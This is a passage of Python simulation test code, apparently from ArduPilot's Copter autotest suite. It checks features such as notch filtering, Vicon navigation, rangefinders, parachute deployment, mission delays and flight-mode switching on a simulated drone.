"SIM_VIB_MOT_MAX": 350,
# these are real values taken from a 180mm Quad:
"SIM_GYR1_RND": 20,
"SIM_ACC1_RND": 5,
"SIM_ACC2_RND": 5,
"SIM_INS_THR_MIN": 0.1,
})
self.reboot_sitl()
self.takeoff(15, mode="ALT_HOLD")
hover_time = 15
tstart = self.get_sim_time()
self.progress("Hovering for %u seconds" % hover_time)
while self.get_sim_time_cached() < tstart + hover_time:
self.mav.recv_match(type='ATTITUDE', blocking=True)
tend = self.get_sim_time()
# if we don't reduce vibes here then the landing detector
# may not trigger
self.set_parameter("SIM_VIB_MOT_MAX", 0)
self.do_RTL()
psd = self.mavfft_fttd(1, 0, tstart * 1.0e6, tend * 1.0e6)
# ignore the first 20Hz and look for a peak at -15dB or more
ignore_bins = 20
freq = psd["F"][numpy.argmax(psd["X"][ignore_bins:]) + ignore_bins]
if numpy.amax(psd["X"][ignore_bins:]) < -15 or freq < 180 or freq > 300:
raise NotAchievedException(
"Did not detect a motor peak, found %f at %f dB" %
(freq, numpy.amax(psd["X"][ignore_bins:])))
else:
self.progress("Detected motor peak at %fHz" % freq)
# now add a notch and check that post-filter the peak is squashed below 40dB
self.set_parameters({
"INS_LOG_BAT_OPT": 2,
"INS_NOTCH_ENABLE": 1,
"INS_NOTCH_FREQ": freq,
"INS_NOTCH_ATT": 50,
"INS_NOTCH_BW": freq/2,
"SIM_VIB_MOT_MAX": 350,
})
self.reboot_sitl()
self.takeoff(15, mode="ALT_HOLD")
tstart = self.get_sim_time()
self.progress("Hovering for %u seconds" % hover_time)
while self.get_sim_time_cached() < tstart + hover_time:
self.mav.recv_match(type='ATTITUDE', blocking=True)
tend = self.get_sim_time()
self.set_parameter("SIM_VIB_MOT_MAX", 0)
self.do_RTL()
psd = self.mavfft_fttd(1, 0, tstart * 1.0e6, tend * 1.0e6)
freq = psd["F"][numpy.argmax(psd["X"][ignore_bins:]) + ignore_bins]
peakdB = numpy.amax(psd["X"][ignore_bins:])
if peakdB < -23:
self.progress("Did not detect a motor peak, found %f at %f dB" % (freq, peakdB))
else:
raise NotAchievedException("Detected peak %.1f Hz %.2f dB" % (freq, peakdB))
except Exception as e:
self.print_exception_caught(e)
ex = e
self.disarm_vehicle(force=True)
self.context_pop()
self.reboot_sitl()
if ex is not None:
raise ex
def fly_vision_position(self):
"""Disable GPS navigation, enable Vicon input."""
# scribble down a location we can set origin to:
self.customise_SITL_commandline(["--uartF=sim:vicon:"])
self.progress("Waiting for location")
self.change_mode('LOITER')
self.wait_ready_to_arm()
old_pos = self.mav.recv_match(type='GLOBAL_POSITION_INT', blocking=True)
print("old_pos=%s" % str(old_pos))
self.context_push()
ex = None
try:
# configure EKF to use external nav instead of GPS
ahrs_ekf_type = self.get_parameter("AHRS_EKF_TYPE")
if ahrs_ekf_type == 2:
self.set_parameter("EK2_GPS_TYPE", 3)
if ahrs_ekf_type == 3:
self.set_parameter("EK3_SRC1_POSXY", 6)
self.set_parameter("EK3_SRC1_VELXY", 6)
self.set_parameter("EK3_SRC1_POSZ", 6)
self.set_parameter("EK3_SRC1_VELZ", 6)
self.set_parameter("GPS_TYPE", 0)
self.set_parameter("VISO_TYPE", 1)
self.set_parameter("SERIAL5_PROTOCOL", 1)
self.reboot_sitl()
# without a GPS or some sort of external prompting, AP
# doesn't send system_time messages. So prompt it:
self.mav.mav.system_time_send(int(time.time() * 1000000), 0)
self.progress("Waiting for non-zero-lat")
tstart = self.get_sim_time()
while True:
self.mav.mav.set_gps_global_origin_send(1,
old_pos.lat,
old_pos.lon,
old_pos.alt)
gpi = self.mav.recv_match(type='GLOBAL_POSITION_INT',
blocking=True)
self.progress("gpi=%s" % str(gpi))
if gpi.lat != 0:
break
if self.get_sim_time_cached() - tstart > 60:
raise AutoTestTimeoutException("Did not get non-zero lat")
self.takeoff()
self.set_rc(1, 1600)
tstart = self.get_sim_time()
while True:
vicon_pos = self.mav.recv_match(type='VISION_POSITION_ESTIMATE',
blocking=True)
# print("vpe=%s" % str(vicon_pos))
self.mav.recv_match(type='GLOBAL_POSITION_INT',
blocking=True)
# self.progress("gpi=%s" % str(gpi))
if vicon_pos.x > 40:
break
if self.get_sim_time_cached() - tstart > 100:
raise AutoTestTimeoutException("Vicon showed no movement")
# recenter controls:
self.set_rc(1, 1500)
self.progress("# Enter RTL")
self.change_mode('RTL')
self.set_rc(3, 1500)
tstart = self.get_sim_time()
while True:
if self.get_sim_time_cached() - tstart > 200:
raise NotAchievedException("Did not disarm")
self.mav.recv_match(type='GLOBAL_POSITION_INT',
blocking=True)
# print("gpi=%s" % str(gpi))
self.mav.recv_match(type='SIMSTATE',
blocking=True)
# print("ss=%s" % str(ss))
# wait for RTL disarm:
if not self.armed():
break
except Exception as e:
self.print_exception_caught(e)
ex = e
self.context_pop()
self.zero_throttle()
self.reboot_sitl()
if ex is not None:
raise ex
def fly_gps_vicon_switching(self):
"""Fly GPS and Vicon switching test"""
self.customise_SITL_commandline(["--uartF=sim:vicon:"])
"""Setup parameters including switching to EKF3"""
self.context_push()
ex = None
try:
self.set_parameters({
"VISO_TYPE": 2, # enable vicon
"SERIAL5_PROTOCOL": 2,
"EK3_ENABLE": 1,
"EK3_SRC2_POSXY": 6, # External Nav
"EK3_SRC2_POSZ": 6, # External Nav
"EK3_SRC2_VELXY": 6, # External Nav
"EK3_SRC2_VELZ": 6, # External Nav
"EK3_SRC2_YAW": 6, # External Nav
"RC7_OPTION": 80, # RC aux switch 7 set to Viso Align
"RC8_OPTION": 90, # RC aux switch 8 set to EKF source selector
"EK2_ENABLE": 0,
"AHRS_EKF_TYPE": 3,
})
self.reboot_sitl()
# switch to use GPS
self.set_rc(8, 1000)
# ensure we can get a global position:
self.poll_home_position(timeout=120)
# record starting position
old_pos = self.get_global_position_int()
print("old_pos=%s" % str(old_pos))
# align vicon yaw with ahrs heading
self.set_rc(7, 2000)
# takeoff to 10m in Loiter
self.progress("Moving to ensure location is tracked")
self.takeoff(10, mode="LOITER", require_absolute=True, timeout=720)
# fly forward in Loiter
self.set_rc(2, 1300)
# disable vicon
self.set_parameter("SIM_VICON_FAIL", 1)
# ensure vehicle remain in Loiter for 15 seconds
tstart = self.get_sim_time()
while self.get_sim_time() - tstart < 15:
if not self.mode_is('LOITER'):
raise NotAchievedException("Expected to stay in loiter for >15 seconds")
# re-enable vicon
self.set_parameter("SIM_VICON_FAIL", 0)
# switch to vicon, disable GPS and wait 10sec to ensure vehicle remains in Loiter
self.set_rc(8, 1500)
self.set_parameter("GPS_TYPE", 0)
# ensure vehicle remain in Loiter for 15 seconds
tstart = self.get_sim_time()
while self.get_sim_time() - tstart < 15:
if not self.mode_is('LOITER'):
raise NotAchievedException("Expected to stay in loiter for >15 seconds")
# RTL and check vehicle arrives within 10m of home
self.set_rc(2, 1500)
self.do_RTL()
except Exception as e:
self.print_exception_caught(e)
ex = e
self.context_pop()
self.disarm_vehicle(force=True)
self.reboot_sitl()
if ex is not None:
raise ex
def fly_rtl_speed(self):
"""Test RTL Speed parameters"""
rtl_speed_ms = 7
wpnav_speed_ms = 4
wpnav_accel_mss = 3
tolerance = 0.5
self.load_mission("copter_rtl_speed.txt")
self.set_parameter('WPNAV_ACCEL', wpnav_accel_mss * 100)
self.set_parameter('RTL_SPEED', rtl_speed_ms * 100)
self.set_parameter('WPNAV_SPEED', wpnav_speed_ms * 100)
self.change_mode('LOITER')
self.wait_ready_to_arm()
self.arm_vehicle()
self.change_mode('AUTO')
self.set_rc(3, 1600)
self.wait_altitude(19, 25, relative=True)
self.wait_groundspeed(wpnav_speed_ms-tolerance, wpnav_speed_ms+tolerance)
self.monitor_groundspeed(wpnav_speed_ms, timeout=20)
self.change_mode('RTL')
self.wait_groundspeed(rtl_speed_ms-tolerance, rtl_speed_ms+tolerance)
self.monitor_groundspeed(rtl_speed_ms, timeout=5)
self.change_mode('AUTO')
self.wait_groundspeed(0-tolerance, 0+tolerance)
self.wait_groundspeed(wpnav_speed_ms-tolerance, wpnav_speed_ms+tolerance)
self.monitor_groundspeed(wpnav_speed_ms, tolerance=0.6, timeout=5)
self.do_RTL()
def fly_nav_delay(self):
"""Fly a simple mission that has a delay in it."""
self.load_mission("copter_nav_delay.txt")
self.set_parameter("DISARM_DELAY", 0)
self.change_mode("LOITER")
self.wait_ready_to_arm()
self.arm_vehicle()
self.change_mode("AUTO")
self.set_rc(3, 1600)
count_start = -1
count_stop = -1
tstart = self.get_sim_time()
last_mission_current_msg = 0
last_seq = None
while self.armed(): # we RTL at end of mission
now = self.get_sim_time_cached()
if now - tstart > 200:
raise AutoTestTimeoutException("Did not disarm as expected")
m = self.mav.recv_match(type='MISSION_CURRENT', blocking=True)
at_delay_item = ""
if m.seq == 3:
at_delay_item = "(At delay item)"
if count_start == -1:
count_start = now
if ((now - last_mission_current_msg) > 1 or m.seq != last_seq):
dist = None
x = self.mav.messages.get("NAV_CONTROLLER_OUTPUT", None)
if x is not None:
dist = x.wp_dist
self.progress("MISSION_CURRENT.seq=%u dist=%s %s" %
(m.seq, dist, at_delay_item))
last_mission_current_msg = self.get_sim_time_cached()
last_seq = m.seq
if m.seq > 3:
if count_stop == -1:
count_stop = now
calculated_delay = count_stop - count_start
want_delay = 59 # should reflect what's in the mission file
self.progress("Stopped for %u seconds (want >=%u seconds)" %
(calculated_delay, want_delay))
if calculated_delay < want_delay:
raise NotAchievedException("Did not delay for long enough")
def test_rangefinder(self):
ex = None
self.context_push()
self.progress("Making sure we don't ordinarily get RANGEFINDER")
m = self.mav.recv_match(type='RANGEFINDER',
blocking=True,
timeout=5)
if m is not None:
raise NotAchievedException("Received unexpected RANGEFINDER msg")
# may need to force a rotation if some other test has used the
# rangefinder...
self.progress("Ensure no RFND messages in log")
self.set_parameter("LOG_DISARMED", 1)
if self.current_onboard_log_contains_message("RFND"):
raise NotAchievedException("Found unexpected RFND message")
try:
self.set_analog_rangefinder_parameters()
self.set_parameter("RC9_OPTION", 10) # rangefinder
self.set_rc(9, 2000)
self.reboot_sitl()
self.progress("Making sure we now get RANGEFINDER messages")
m = self.mav.recv_match(type='RANGEFINDER',
blocking=True,
timeout=10)
if m is None:
raise NotAchievedException("Did not get expected RANGEFINDER msg")
self.progress("Checking RangeFinder is marked as enabled in mavlink")
m = self.mav.recv_match(type='SYS_STATUS',
blocking=True,
timeout=10)
flags = m.onboard_control_sensors_enabled
if not flags & mavutil.mavlink.MAV_SYS_STATUS_SENSOR_LASER_POSITION:
raise NotAchievedException("Laser not enabled in SYS_STATUS")
self.progress("Disabling laser using switch")
self.set_rc(9, 1000)
self.delay_sim_time(1)
self.progress("Checking RangeFinder is marked as disabled in mavlink")
m = self.mav.recv_match(type='SYS_STATUS',
blocking=True,
timeout=10)
flags = m.onboard_control_sensors_enabled
if flags & mavutil.mavlink.MAV_SYS_STATUS_SENSOR_LASER_POSITION:
raise NotAchievedException("Laser enabled in SYS_STATUS")
self.progress("Re-enabling rangefinder")
self.set_rc(9, 2000)
self.delay_sim_time(1)
m = self.mav.recv_match(type='SYS_STATUS',
blocking=True,
timeout=10)
flags = m.onboard_control_sensors_enabled
if not flags & mavutil.mavlink.MAV_SYS_STATUS_SENSOR_LASER_POSITION:
raise NotAchievedException("Laser not enabled in SYS_STATUS")
self.takeoff(10, mode="LOITER")
m_r = self.mav.recv_match(type='RANGEFINDER',
blocking=True)
m_p = self.mav.recv_match(type='GLOBAL_POSITION_INT',
blocking=True)
if abs(m_r.distance - m_p.relative_alt/1000) > 1:
raise NotAchievedException(
"rangefinder/global position int mismatch %0.2f vs %0.2f" %
(m_r.distance, m_p.relative_alt/1000))
self.land_and_disarm()
if not self.current_onboard_log_contains_message("RFND"):
raise NotAchievedException("Did not see expected RFND message")
except Exception as e:
self.print_exception_caught(e)
ex = e
self.context_pop()
self.reboot_sitl()
if ex is not None:
raise ex
def test_terrain_spline_mission(self):
self.set_parameter("AUTO_OPTIONS", 3)
self.set_parameter("TERRAIN_ENABLE", 0)
self.load_mission("wp.txt")
self.change_mode('AUTO')
self.wait_ready_to_arm()
self.arm_vehicle()
self.wait_waypoint(4, 4)
self.wait_disarmed()
def test_surface_tracking(self):
ex = None
self.context_push()
# we must start mavproxy here as otherwise we can't get the
# terrain database tiles - this leads to random failures in
# CI!
mavproxy = self.start_mavproxy()
try:
self.set_analog_rangefinder_parameters()
self.set_parameter("RC9_OPTION", 10) # rangefinder
self.set_rc(9, 2000)
self.reboot_sitl() # needed for both rangefinder and initial position
self.assert_vehicle_location_is_at_startup_location()
self.takeoff(10, mode="LOITER")
lower_surface_pos = mavutil.location(-35.362421, 149.164534, 584, 270)
here = self.mav.location()
bearing = self.get_bearing(here, lower_surface_pos)
self.change_mode("GUIDED")
self.guided_achieve_heading(bearing)
self.change_mode("LOITER")
self.delay_sim_time(2)
m = self.mav.recv_match(type='GLOBAL_POSITION_INT', blocking=True)
orig_absolute_alt_mm = m.alt
self.progress("Original alt: absolute=%f" % orig_absolute_alt_mm)
self.progress("Flying somewhere which surface is known lower compared to takeoff point")
self.set_rc(2, 1450)
tstart = self.get_sim_time()
while True:
if self.get_sim_time() - tstart > 200:
raise NotAchievedException("Did not reach lower point")
m = self.mav.recv_match(type='GLOBAL_POSITION_INT', blocking=True)
x = mavutil.location(m.lat/1e7, m.lon/1e7, m.alt/1e3, 0)
dist = self.get_distance(x, lower_surface_pos)
delta = (orig_absolute_alt_mm - m.alt)/1000.0
self.progress("Distance: %fm abs-alt-delta: %fm" %
(dist, delta))
if dist < 15:
if delta < 0.8:
raise NotAchievedException("Did not dip in altitude as expected")
break
self.set_rc(2, 1500)
self.do_RTL()
except Exception as e:
self.print_exception_caught(e)
self.disarm_vehicle(force=True)
ex = e
self.stop_mavproxy(mavproxy)
self.context_pop()
self.reboot_sitl()
if ex is not None:
raise ex
def test_rangefinder_switchover(self):
"""test that the EKF correctly handles the switchover between baro and rangefinder"""
ex = None
self.context_push()
try:
self.set_analog_rangefinder_parameters()
self.set_parameters({
"RNGFND1_MAX_CM": 1500
})
# configure EKF to use rangefinder for altitude at low altitudes
ahrs_ekf_type = self.get_parameter("AHRS_EKF_TYPE")
if ahrs_ekf_type == 2:
self.set_parameter("EK2_RNG_USE_HGT", 70)
if ahrs_ekf_type == 3:
self.set_parameter("EK3_RNG_USE_HGT", 70)
self.reboot_sitl() # needed for both rangefinder and initial position
self.assert_vehicle_location_is_at_startup_location()
self.change_mode("LOITER")
self.wait_ready_to_arm()
self.arm_vehicle()
self.set_rc(3, 1800)
self.set_rc(2, 1200)
# wait till we get to 50m
self.wait_altitude(50, 52, True, 60)
self.change_mode("RTL")
# wait till we get to 25m
self.wait_altitude(25, 27, True, 120)
# level up
self.set_rc(2, 1500)
self.wait_altitude(14, 15, relative=True)
self.wait_rtl_complete()
except Exception as e:
self.print_exception_caught(e)
self.disarm_vehicle(force=True)
ex = e
self.context_pop()
self.reboot_sitl()
if ex is not None:
raise ex
def test_parachute(self):
self.set_rc(9, 1000)
self.set_parameter("CHUTE_ENABLED", 1)
self.set_parameter("CHUTE_TYPE", 10)
self.set_parameter("SERVO9_FUNCTION", 27)
self.set_parameter("SIM_PARA_ENABLE", 1)
self.set_parameter("SIM_PARA_PIN", 9)
self.progress("Test triggering parachute in mission")
self.load_mission("copter_parachute_mission.txt")
self.change_mode('LOITER')
self.wait_ready_to_arm()
self.arm_vehicle()
self.change_mode('AUTO')
self.set_rc(3, 1600)
self.wait_statustext('BANG', timeout=60)
self.disarm_vehicle(force=True)
self.reboot_sitl()
self.progress("Test triggering with mavlink message")
self.takeoff(20)
self.run_cmd(mavutil.mavlink.MAV_CMD_DO_PARACHUTE,
2, # release
0,
0,
0,
0,
0,
0)
self.wait_statustext('BANG', timeout=60)
self.disarm_vehicle(force=True)
self.reboot_sitl()
self.progress("Testing three-position switch")
self.set_parameter("RC9_OPTION", 23) # parachute 3pos
self.progress("Test manual triggering")
self.takeoff(20)
self.set_rc(9, 2000)
self.wait_statustext('BANG', timeout=60)
self.set_rc(9, 1000)
self.disarm_vehicle(force=True)
self.reboot_sitl()
self.context_push()
self.progress("Crashing with 3pos switch in enable position")
self.takeoff(40)
self.set_rc(9, 1500)
self.set_parameter("SIM_ENGINE_MUL", 0)
self.set_parameter("SIM_ENGINE_FAIL", 1)
self.wait_statustext('BANG', timeout=60)
self.set_rc(9, 1000)
self.disarm_vehicle(force=True)
self.reboot_sitl()
self.context_pop()
self.progress("Crashing with 3pos switch in disable position")
loiter_alt = 10
self.takeoff(loiter_alt, mode='LOITER')
self.set_rc(9, 1100)
self.set_parameter("SIM_ENGINE_MUL", 0)
self.set_parameter("SIM_ENGINE_FAIL", 1)
tstart = self.get_sim_time()
while self.get_sim_time_cached() < tstart + 5:
m = self.mav.recv_match(type='STATUSTEXT', blocking=True, timeout=1)
if m is None:
continue
if "BANG" in m.text:
self.set_rc(9, 1000)
self.reboot_sitl()
raise NotAchievedException("Parachute deployed when disabled")
self.set_rc(9, 1000)
self.disarm_vehicle(force=True)
self.reboot_sitl()
def test_motortest(self, timeout=60):
self.start_subtest("Testing PWM output")
pwm_in = 1300
# default frame is "+" - start motor of 2 is "B", which is
# motor 1... see
# https://ardupilot.org/copter/docs/connect-escs-and-motors.html
self.run_cmd(mavutil.mavlink.MAV_CMD_DO_MOTOR_TEST,
2, # start motor
mavutil.mavlink.MOTOR_TEST_THROTTLE_PWM,
pwm_in, # pwm-to-output
2, # timeout in seconds
2, # number of motors to output
0, # compass learning
0,
timeout=timeout)
# long timeouts here because there's a pause before we start motors
self.wait_servo_channel_value(1, pwm_in, timeout=10)
self.wait_servo_channel_value(4, pwm_in, timeout=10)
self.wait_statustext("finished motor test")
self.end_subtest("Testing PWM output")
self.start_subtest("Testing percentage output")
percentage = 90.1
# since MOT_SPIN_MIN and MOT_SPIN_MAX are not set, the RC3
# min/max are used.
expected_pwm = 1000 + (self.get_parameter("RC3_MAX") - self.get_parameter("RC3_MIN")) * percentage/100.0
self.progress("expected pwm=%f" % expected_pwm)
self.run_cmd(mavutil.mavlink.MAV_CMD_DO_MOTOR_TEST,
2, # start motor
mavutil.mavlink.MOTOR_TEST_THROTTLE_PERCENT,
percentage, # pwm-to-output
2, # timeout in seconds
2, # number of motors to output
0, # compass learning
0,
timeout=timeout)
self.wait_servo_channel_value(1, expected_pwm, timeout=10)
self.wait_servo_channel_value(4, expected_pwm, timeout=10)
self.wait_statustext("finished motor test")
self.end_subtest("Testing percentage output")
def fly_precision_sitl(self):
"""Use SITL PrecLand backend precision messages to land aircraft."""
self.context_push()
ex = None
try:
self.set_parameter("PLND_ENABLED", 1)
self.set_parameter("PLND_TYPE", 4)
self.set_analog_rangefinder_parameters()
self.set_parameter("SIM_SONAR_SCALE", 12)
start = self.mav.location()
target = start
(target.lat, target.lng) = mavextra.gps_offset(start.lat, start.lng, 4, -4)
self.progress("Setting target to %f %f" % (target.lat, target.lng))
self.set_parameter("SIM_PLD_ENABLE", 1)
self.set_parameter("SIM_PLD_LAT", target.lat)
self.set_parameter("SIM_PLD_LON", target.lng)
self.set_parameter("SIM_PLD_HEIGHT", 0)
self.set_parameter("SIM_PLD_ALT_LMT", 15)
self.set_parameter("SIM_PLD_DIST_LMT", 10)
self.reboot_sitl()
self.progress("Waiting for location")
self.zero_throttle()
self.takeoff(10, 1800)
self.change_mode("LAND")
self.wait_landed_and_disarmed()
self.mav.recv_match(type='GLOBAL_POSITION_INT', blocking=True)
new_pos = self.mav.location()
delta = self.get_distance(target, new_pos)
self.progress("Landed %f metres from target position" % delta)
max_delta = 1
if delta > max_delta:
raise NotAchievedException("Did not land close enough to target position (%fm > %fm" % (delta, max_delta))
if not self.current_onboard_log_contains_message("PL"):
raise NotAchievedException("Did not see expected PL message")
except Exception as e:
self.print_exception_caught(e)
ex = e
self.zero_throttle()
self.context_pop()
self.reboot_sitl()
self.progress("All done")
if ex is not None:
raise ex
def get_system_clock_utc(self, time_seconds):
# this is a copy of ArduPilot's AP_RTC function!
# separate time into ms, sec, min, hour and days but all expressed
# in milliseconds
time_ms = time_seconds * 1000
ms = time_ms % 1000
sec_ms = (time_ms % (60 * 1000)) - ms
min_ms = (time_ms % (60 * 60 * 1000)) - sec_ms - ms
hour_ms = (time_ms % (24 * 60 * 60 * 1000)) - min_ms - sec_ms - ms
# convert times as milliseconds into appropriate units
secs = sec_ms / 1000
mins = min_ms / (60 * 1000)
hours = hour_ms / (60 * 60 * 1000)
return (hours, mins, secs, 0)
def calc_delay(self, seconds, delay_for_seconds):
# delay-for-seconds has to be long enough that we're at the
# waypoint before that time. Otherwise we'll try to wait a
# day....
if delay_for_seconds >= 3600:
raise ValueError("Won't handle large delays")
(hours,
mins,
secs,
ms) = self.get_system_clock_utc(seconds)
self.progress("Now is %uh %um %us" % (hours, mins, secs))
secs += delay_for_seconds # add seventeen seconds
mins += int(secs/60)
secs %= 60
hours += int(mins / 60)
mins %= 60
if hours > 24:
raise ValueError("Way too big a delay")
self.progress("Delay until %uh %um %us" %
(hours, mins, secs))
return (hours, mins, secs, 0)
def reset_delay_item(self, seq, seconds_in_future):
frame = mavutil.mavlink.MAV_FRAME_GLOBAL_RELATIVE_ALT_INT
command = mavutil.mavlink.MAV_CMD_NAV_DELAY
# retrieve mission item and check it:
tried_set = False
hours = None
mins = None
secs = None
while True:
self.progress("Requesting item")
self.mav.mav.mission_request_send(1,
1,
seq)
st = self.mav.recv_match(type='MISSION_ITEM',
blocking=True,
timeout=1)
if st is None:
continue
print("Item: %s" % str(st))
have_match = (tried_set and
st.seq == seq and
st.command == command and
st.param2 == hours and
st.param3 == mins and
st.param4 == secs)
if have_match:
return
self.progress("Mission mismatch")
m = None
tstart = self.get_sim_time()
while True:
if self.get_sim_time_cached() - tstart > 3:
raise NotAchievedException(
"Did not receive MISSION_REQUEST")
self.mav.mav.mission_write_partial_list_send(1,
1,
seq,
seq)
m = self.mav.recv_match(type='MISSION_REQUEST',
blocking=True,
timeout=1)
if m is None:
continue
if m.seq != st.seq:
continue
break
self.progress("Sending absolute-time mission item")
# we have to change out the delay time...
now = self.mav.messages["SYSTEM_TIME"]
if now is None:
raise PreconditionFailedException("Never got SYSTEM_TIME")
if now.time_unix_usec == 0:
raise PreconditionFailedException("system time is zero")
(hours, mins, secs, ms) = self.calc_delay(now.time_unix_usec/1000000, seconds_in_future)
self.mav.mav.mission_item_send(
1, # target system
1, # target component
seq, # seq
frame, # frame
command, # command
0, # current
1, # autocontinue
0, # p1 (relative seconds)
hours, # p2
mins, # p3
secs, # p4
0, # p5
0, # p6
0) # p7
tried_set = True
ack = self.mav.recv_match(type='MISSION_ACK',
blocking=True,
timeout=1)
self.progress("Received ack: %s" % str(ack))
def fly_nav_delay_abstime(self):
"""fly a simple mission that has a delay in it"""
self.fly_nav_delay_abstime_x(87)
def fly_nav_delay_abstime_x(self, delay_for, expected_delay=None):
"""fly a simple mission that has a delay in it, expect a delay"""
if expected_delay is None:
expected_delay = delay_for
self.load_mission("copter_nav_delay.txt")
self.change_mode("LOITER")
self.wait_ready_to_arm()
delay_item_seq = 3
self.reset_delay_item(delay_item_seq, delay_for)
delay_for_seconds = delay_for
reset_at_m = self.mav.recv_match(type='SYSTEM_TIME', blocking=True)
reset_at = reset_at_m.time_unix_usec/1000000
self.arm_vehicle()
self.change_mode("AUTO")
self.set_rc(3, 1600)
count_stop = -1
tstart = self.get_sim_time()
while self.armed(): # we RTL at end of mission
now = self.get_sim_time_cached()
if now - tstart > 240:
raise AutoTestTimeoutException("Did not disarm as expected")
m = self.mav.recv_match(type='MISSION_CURRENT', blocking=True)
at_delay_item = ""
if m.seq == delay_item_seq:
at_delay_item = "(delay item)"
self.progress("MISSION_CURRENT.seq=%u %s" % (m.seq, at_delay_item))
if m.seq > delay_item_seq:
if count_stop == -1:
count_stop_m = self.mav.recv_match(type='SYSTEM_TIME',
blocking=True)
count_stop = count_stop_m.time_unix_usec/1000000
calculated_delay = count_stop - reset_at
error = abs(calculated_delay - expected_delay)
self.progress("Stopped for %u seconds (want >=%u seconds)" %
(calculated_delay, delay_for_seconds))
if error > 2:
raise NotAchievedException("delay outside expectations")
def fly_nav_takeoff_delay_abstime(self):
"""make sure taking off at a specific time works"""
self.load_mission("copter_nav_delay_takeoff.txt")
self.change_mode("LOITER")
self.wait_ready_to_arm()
delay_item_seq = 2
delay_for_seconds = 77
self.reset_delay_item(delay_item_seq, delay_for_seconds)
reset_at = self.get_sim_time_cached()
self.arm_vehicle()
self.change_mode("AUTO")
self.set_rc(3, 1600)
# should not take off for about least 77 seconds
tstart = self.get_sim_time()
took_off = False
while self.armed():
now = self.get_sim_time_cached()
if now - tstart > 200:
# timeout
break
m = self.mav.recv_match(type='MISSION_CURRENT', blocking=True)
now = self.get_sim_time_cached()
self.progress("%s" % str(m))
if m.seq > delay_item_seq:
if not took_off:
took_off = True
delta_time = now - reset_at
if abs(delta_time - delay_for_seconds) > 2:
raise NotAchievedException((
"Did not take off on time "
"measured=%f want=%f" %
(delta_time, delay_for_seconds)))
if not took_off:
raise NotAchievedException("Did not take off")
def fly_zigzag_mode(self):
'''test zigzag mode'''
# set channel 8 for zigzag savewp and recentre it
self.set_parameter("RC8_OPTION", 61)
self.takeoff(alt_min=5, mode='LOITER')
ZIGZAG = 24
j = 0
slowdown_speed = 0.3 # because Copter takes a long time to actually stop
self.start_subtest("Conduct ZigZag test for all 4 directions")
while j < 4:
self.progress("## Align heading with the run-way (j=%d)##" % j)
self.set_rc(8, 1500)
self.set_rc(4, 1420)
self.wait_heading(352-j*90)
self.set_rc(4, 1500)
self.change_mode(ZIGZAG)
self.progress("## Record Point A ##")
self.set_rc(8, 1100) # record point A
self.set_rc(1, 1700) # fly side-way for 20m
self.wait_distance(20)
self.set_rc(1, 1500)
self.wait_groundspeed(0, slowdown_speed) # wait until the copter slows down
self.progress("## Record Point A ##")
self.set_rc(8, 1500) # pilot always have to cross mid position when changing for low to high position
self.set_rc(8, 1900) # record point B
i = 1
while i < 2:
self.start_subtest("Run zigzag A->B and B->A (i=%d)" % i)
self.progress("## fly forward for 10 meter ##")
self.set_rc(2, 1300)
self.wait_distance(10)
self.set_rc(2, 1500) # re-centre pitch rc control
self.wait_groundspeed(0, slowdown_speed) # wait until the copter slows down
self.set_rc(8, 1500) # switch to mid position
self.progress("## auto execute vector BA ##")
self.set_rc(8, 1100)
self.wait_distance(17) # wait for it to finish
self.wait_groundspeed(0, slowdown_speed) # wait until the copter slows down
self.progress("## fly forward for 10 meter ##")
self.set_rc(2, 1300) # fly forward for 10 meter
self.wait_distance(10)
self.set_rc(2, 1500) # re-centre pitch rc control
self.wait_groundspeed(0, slowdown_speed) # wait until the copter slows down
self.set_rc(8, 1500) # switch to mid position
self.progress("## auto execute vector AB ##")
self.set_rc(8, 1900)
self.wait_distance(17) # wait for it to finish
self.wait_groundspeed(0, slowdown_speed) # wait until the copter slows down
i = i + 1
# test the case when pilot switch to manual control during the auto flight
self.start_subtest("test the case when pilot switch to manual control during the auto flight")
self.progress("## fly forward for 10 meter ##")
self.set_rc(2, 1300) # fly forward for 10 meter
self.wait_distance(10)
self.set_rc(2, 1500) # re-centre pitch rc control
self.wait_groundspeed(0, 0.3) # wait until the copter slows down
self.set_rc(8, 1500) # switch to mid position
self.progress("## auto execute vector BA ##")
self.set_rc(8, 1100) # switch to low position, auto execute vector BA
self.wait_distance(8) # purposely switch to manual halfway
self.set_rc(8, 1500)
self.wait_groundspeed(0, slowdown_speed) # copter should slow down here
self.progress("## Manual control to fly forward ##")
self.set_rc(2, 1300) # manual control to fly forward
self.wait_distance(8)
self.set_rc(2, 1500) # re-centre pitch rc control
self.wait_groundspeed(0, slowdown_speed) # wait until the copter slows down
self.progress("## continue vector BA ##")
self.set_rc(8, 1100) # copter should continue mission here
self.wait_distance(8) # wait for it to finish rest of BA
self.wait_groundspeed(0, slowdown_speed) # wait until the copter slows down
self.set_rc(8, 1500) # switch to mid position
self.progress("## auto execute vector AB ##")
self.set_rc(8, 1900) # switch to execute AB again
self.wait_distance(17) # wait for it to finish
self.wait_groundspeed(0, slowdown_speed) # wait until the copter slows down
self.change_mode('LOITER')
j = j + 1
self.do_RTL()
def test_setting_modes_via_modeswitch(self):
self.context_push()
ex = None
try:
fltmode_ch = 5
self.set_parameter("FLTMODE_CH", fltmode_ch)
self.set_rc(fltmode_ch, 1000) # PWM for mode1
testmodes = [("FLTMODE1", 4, "GUIDED", 1165),
("FLTMODE2", 13, "SPORT", 1295),
("FLTMODE3", 6, "RTL", 1425),
("FLTMODE4", 7, "CIRCLE", 1555),
("FLTMODE5", 1, "ACRO", 1685),
("FLTMODE6", 17, "BRAKE", 1815),
]
for mode in testmodes:
(parm, parm_value, name, pwm) = mode
self.set_parameter(parm, parm_value)
for mode in reversed(testmodes):
(parm, parm_value, name, pwm) = mode
self.set_rc(fltmode_ch, pwm)
self.wait_mode(name)
for mode in testmodes:
(parm, parm_value, name, pwm) = mode
self.set_rc(fltmode_ch, pwm)
self.wait_mode(name)
for mode in reversed(testmodes):
(parm, parm_value, name, pwm) = mode
self.set_rc(fltmode_ch, pwm)
self.wait_mode(name)
except Exception as e:
self.print_exception_caught(e)
ex = e
self.context_pop()
if ex is not None:
raise ex
def test_setting_modes_via_auxswitch(self):
self.context_push()
ex = None
try:
fltmode_ch = int(self.get_parameter("FLTMODE_CH"))
self.set_rc(fltmode_ch, 1000)
self.wait_mode("CIRCLE")
self.set_rc(9, 1000)
self.set_rc(10, 1000)
self.set_parameter("RC9_OPTION", 18) # land
self.set_parameter("RC10_OPTION", 55) # guided
self.set_rc(9, 1900)
self.wait_mode("LAND")
self.set_rc(10, 1900)
self.wait_mode("GUIDED")
self.set_rc(10, 1000) # this re-polls the mode switch
